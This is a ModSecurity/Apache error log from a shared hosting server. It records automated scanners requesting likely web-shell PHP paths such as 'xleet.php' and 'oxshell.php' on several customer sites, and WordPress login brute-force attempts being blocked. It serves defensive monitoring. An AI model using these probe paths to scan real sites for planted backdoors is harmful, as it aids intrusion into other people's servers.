[Tue May 26 18:39:31.797205 2026] [security2:error] [pid 1015481:tid 1015640] [client 20.151.117.104:14093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/xleet.php"] [unique_id "ahWbi7QIKfWDMlp2INdQSgAAASc"]
[Tue May 26 18:39:31.838646 2026] [security2:error] [pid 1015481:tid 1015724] [client 130.131.224.225:30666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-thi.php"] [unique_id "ahWbi7QIKfWDMlp2INdQSwAAAXs"]
[Tue May 26 18:39:31.838774 2026] [security2:error] [pid 1015481:tid 1015724] [client 130.131.224.225:30666] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-thi.php"] [unique_id "ahWbi7QIKfWDMlp2INdQSwAAAXs"]
[Tue May 26 18:39:32.008519 2026] [security2:error] [pid 1015481:tid 1015689] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbi7QIKfWDMlp2INdQRgAAAVg"]
[Tue May 26 18:39:32.014216 2026] [security2:error] [pid 1015481:tid 1015717] [client 20.196.127.68:8004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/network.php"] [unique_id "ahWbjLQIKfWDMlp2INdQVAAAAXQ"]
[Tue May 26 18:39:32.067117 2026] [security2:error] [pid 1015481:tid 1015666] [client 20.151.117.104:14055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp.php"] [unique_id "ahWbjLQIKfWDMlp2INdQVQAAAUE"]
[Tue May 26 18:39:32.071325 2026] [security2:error] [pid 1015481:tid 1015525] [remote 52.66.96.197:52872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbi7QIKfWDMlp2INdQTAABFys"]
[Tue May 26 18:39:32.104162 2026] [security2:error] [pid 1015481:tid 1015688] [client 130.131.224.225:64403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWbjLQIKfWDMlp2INdQWAAAAVc"]
[Tue May 26 18:39:32.104263 2026] [security2:error] [pid 1015481:tid 1015688] [client 130.131.224.225:64403] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahWbjLQIKfWDMlp2INdQWAAAAVc"]
[Tue May 26 18:39:32.310670 2026] [security2:error] [pid 1015481:tid 1015642] [client 20.151.117.104:14070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/155.php"] [unique_id "ahWbjLQIKfWDMlp2INdQXgAAASk"]
[Tue May 26 18:39:32.351225 2026] [security2:error] [pid 1015481:tid 1015667] [client 130.131.224.225:51018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/amax.php"] [unique_id "ahWbjLQIKfWDMlp2INdQXwAAAUI"]
[Tue May 26 18:39:32.351320 2026] [security2:error] [pid 1015481:tid 1015667] [client 130.131.224.225:51018] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/amax.php"] [unique_id "ahWbjLQIKfWDMlp2INdQXwAAAUI"]
[Tue May 26 18:39:32.527076 2026] [security2:error] [pid 1015481:tid 1015498] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbjLQIKfWDMlp2INdQagABMhA"]
[Tue May 26 18:39:32.527209 2026] [security2:error] [pid 1015481:tid 1015651] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbjLQIKfWDMlp2INdQagABMhA"]
[Tue May 26 18:39:32.551051 2026] [security2:error] [pid 1015481:tid 1015718] [client 109.248.128.168:48499] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWbjLQIKfWDMlp2INdQYwAAAXU"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 18:39:32.573571 2026] [security2:error] [pid 1015481:tid 1015649] [client 20.151.117.104:14143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/96i.php"] [unique_id "ahWbjLQIKfWDMlp2INdQawAAATA"]
[Tue May 26 18:39:32.634520 2026] [security2:error] [pid 1015481:tid 1015621] [client 20.196.127.68:7871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/new.php"] [unique_id "ahWbjLQIKfWDMlp2INdQbAAAARQ"]
[Tue May 26 18:39:32.814336 2026] [security2:error] [pid 1015481:tid 1015646] [client 20.151.117.104:14137] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/as.php"] [unique_id "ahWbjLQIKfWDMlp2INdQcQAAAS0"]
[Tue May 26 18:39:33.074305 2026] [security2:error] [pid 1015481:tid 1015648] [client 20.151.117.104:10320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/min.php"] [unique_id "ahWbjbQIKfWDMlp2INdQdQAAAS8"]
[Tue May 26 18:39:33.125997 2026] [core:crit] [pid 1015481:tid 1015643] (13)Permission denied: [client 52.167.144.23:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:39:33.128138 2026] [security2:error] [pid 1015481:tid 1015617] [client 130.131.224.225:42403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wehrman.php"] [unique_id "ahWbjbQIKfWDMlp2INdQeQAAARA"]
[Tue May 26 18:39:33.128240 2026] [security2:error] [pid 1015481:tid 1015617] [client 130.131.224.225:42403] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wehrman.php"] [unique_id "ahWbjbQIKfWDMlp2INdQeQAAARA"]
[Tue May 26 18:39:33.230895 2026] [security2:error] [pid 1015481:tid 1015737] [client 20.196.127.68:14856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/0x.php"] [unique_id "ahWbjbQIKfWDMlp2INdQewAAAYg"]
[Tue May 26 18:39:33.247699 2026] [security2:error] [pid 1015481:tid 1015496] [remote 52.66.96.197:52872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.96.66.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbjbQIKfWDMlp2INdQegABHw4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:39:33.335079 2026] [autoindex:error] [pid 1015481:tid 1015664] [client 20.151.117.104:14032] AH01276: Cannot serve directory /home2/thego2e9/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:39:33.408506 2026] [security2:error] [pid 1015481:tid 1015611] [client 20.151.117.104:14032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/php8.php"] [unique_id "ahWbjbQIKfWDMlp2INdQgAAAAQo"]
[Tue May 26 18:39:33.468644 2026] [security2:error] [pid 1015481:tid 1015724] [client 130.131.224.225:37425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/b.php"] [unique_id "ahWbjbQIKfWDMlp2INdQggAAAXs"]
[Tue May 26 18:39:33.468821 2026] [security2:error] [pid 1015481:tid 1015724] [client 130.131.224.225:37425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/b.php"] [unique_id "ahWbjbQIKfWDMlp2INdQggAAAXs"]
[Tue May 26 18:39:33.572365 2026] [security2:error] [pid 1015481:tid 1015524] [remote 163.61.60.30:38136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbjbQIKfWDMlp2INdQgQABMSo"]
[Tue May 26 18:39:33.638598 2026] [security2:error] [pid 1015481:tid 1015623] [client 130.131.224.225:51050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-sing.php"] [unique_id "ahWbjbQIKfWDMlp2INdQhgAAARY"]
[Tue May 26 18:39:33.638722 2026] [security2:error] [pid 1015481:tid 1015623] [client 130.131.224.225:51050] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-sing.php"] [unique_id "ahWbjbQIKfWDMlp2INdQhgAAARY"]
[Tue May 26 18:39:33.684993 2026] [security2:error] [pid 1015481:tid 1015719] [client 20.151.117.104:14047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-content/admin.php"] [unique_id "ahWbjbQIKfWDMlp2INdQhwAAAXY"]
[Tue May 26 18:39:33.817775 2026] [security2:error] [pid 1015481:tid 1015689] [client 20.196.127.68:7856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/0.php"] [unique_id "ahWbjbQIKfWDMlp2INdQiAAAAVg"]
[Tue May 26 18:39:33.924880 2026] [security2:error] [pid 1015481:tid 1015695] [client 20.151.117.104:10358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/222.php"] [unique_id "ahWbjbQIKfWDMlp2INdQiQAAAV4"]
[Tue May 26 18:39:34.189776 2026] [security2:error] [pid 1015481:tid 1015631] [client 20.151.117.104:14090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahWbjrQIKfWDMlp2INdQmQAAAR4"]
[Tue May 26 18:39:34.343215 2026] [security2:error] [pid 1015481:tid 1015675] [client 130.131.224.225:24531] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-links-opml.php"] [unique_id "ahWbjrQIKfWDMlp2INdQmwAAAUo"]
[Tue May 26 18:39:34.343305 2026] [security2:error] [pid 1015481:tid 1015675] [client 130.131.224.225:24531] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-links-opml.php"] [unique_id "ahWbjrQIKfWDMlp2INdQmwAAAUo"]
[Tue May 26 18:39:34.401087 2026] [security2:error] [pid 1015481:tid 1015725] [client 20.196.127.68:3598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/oxshell.php"] [unique_id "ahWbjrQIKfWDMlp2INdQnAAAAXw"]
[Tue May 26 18:39:34.449597 2026] [security2:error] [pid 1015481:tid 1015681] [client 20.151.117.104:14026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/info.php"] [unique_id "ahWbjrQIKfWDMlp2INdQoAAAAVA"]
[Tue May 26 18:39:34.466574 2026] [security2:error] [pid 1015481:tid 1015697] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbjrQIKfWDMlp2INdQjwAAAWA"]
[Tue May 26 18:39:34.678166 2026] [security2:error] [pid 1015481:tid 1015732] [client 130.131.224.225:64912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/edit.php"] [unique_id "ahWbjrQIKfWDMlp2INdQpQAAAYM"]
[Tue May 26 18:39:34.678340 2026] [security2:error] [pid 1015481:tid 1015732] [client 130.131.224.225:64912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/edit.php"] [unique_id "ahWbjrQIKfWDMlp2INdQpQAAAYM"]
[Tue May 26 18:39:34.687570 2026] [security2:error] [pid 1015481:tid 1015659] [client 20.151.117.104:14114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/a.php"] [unique_id "ahWbjrQIKfWDMlp2INdQpgAAATo"]
[Tue May 26 18:39:34.945653 2026] [security2:error] [pid 1015481:tid 1015694] [client 20.151.117.104:14126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/chosen.php"] [unique_id "ahWbjrQIKfWDMlp2INdQqgAAAV0"]
[Tue May 26 18:39:35.009573 2026] [security2:error] [pid 1015481:tid 1015707] [client 20.196.127.68:4361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/php8.php"] [unique_id "ahWbj7QIKfWDMlp2INdQqwAAAWo"]
[Tue May 26 18:39:35.197408 2026] [security2:error] [pid 1015481:tid 1015660] [client 20.151.117.104:14110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-content/index.php"] [unique_id "ahWbj7QIKfWDMlp2INdQrwAAATs"]
[Tue May 26 18:39:35.328321 2026] [security2:error] [pid 1015481:tid 1015653] [client 130.131.224.225:51023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wmore1.php"] [unique_id "ahWbj7QIKfWDMlp2INdQtwAAATQ"]
[Tue May 26 18:39:35.328447 2026] [security2:error] [pid 1015481:tid 1015653] [client 130.131.224.225:51023] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wmore1.php"] [unique_id "ahWbj7QIKfWDMlp2INdQtwAAATQ"]
[Tue May 26 18:39:35.453218 2026] [security2:error] [pid 1015481:tid 1015672] [client 20.151.117.104:14056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/vx.php"] [unique_id "ahWbj7QIKfWDMlp2INdQvAAAAUc"]
[Tue May 26 18:39:35.617591 2026] [security2:error] [pid 1015481:tid 1015611] [client 20.196.127.68:9258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/p.php"] [unique_id "ahWbj7QIKfWDMlp2INdQwQAAAQo"]
[Tue May 26 18:39:35.735533 2026] [security2:error] [pid 1015481:tid 1015733] [client 130.131.224.225:25811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-access.php"] [unique_id "ahWbj7QIKfWDMlp2INdQxgAAAYQ"]
[Tue May 26 18:39:35.735676 2026] [security2:error] [pid 1015481:tid 1015733] [client 130.131.224.225:25811] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/wp-access.php"] [unique_id "ahWbj7QIKfWDMlp2INdQxgAAAYQ"]
[Tue May 26 18:39:35.773483 2026] [security2:error] [pid 1015481:tid 1015702] [client 20.151.117.104:14136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wap.php"] [unique_id "ahWbj7QIKfWDMlp2INdQxwAAAWU"]
[Tue May 26 18:39:36.047576 2026] [security2:error] [pid 1015481:tid 1015684] [client 20.151.117.104:14081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-admin/wp.php"] [unique_id "ahWbkLQIKfWDMlp2INdQzQAAAVM"]
[Tue May 26 18:39:36.220437 2026] [security2:error] [pid 1015481:tid 1015715] [client 20.196.127.68:3946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/php.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ0wAAAXI"]
[Tue May 26 18:39:36.233385 2026] [security2:error] [pid 1015481:tid 1015577] [remote 132.148.78.219:57526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWbkLQIKfWDMlp2INdQzwABH18"]
[Tue May 26 18:39:36.325869 2026] [security2:error] [pid 1015481:tid 1015725] [client 20.151.117.104:13580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/bgymj.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ1AAAAXw"]
[Tue May 26 18:39:36.492192 2026] [security2:error] [pid 1015481:tid 1015738] [client 130.131.224.225:64938] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "preetishah.com"] [uri "/1.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ2wAAAYk"]
[Tue May 26 18:39:36.492317 2026] [security2:error] [pid 1015481:tid 1015738] [client 130.131.224.225:64938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/1.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ2wAAAYk"]
[Tue May 26 18:39:36.492441 2026] [security2:error] [pid 1015481:tid 1015738] [client 130.131.224.225:64938] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/1.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ2wAAAYk"]
[Tue May 26 18:39:36.555809 2026] [security2:error] [pid 1015481:tid 1015728] [client 20.151.117.104:14024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/aa.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ3QAAAX8"]
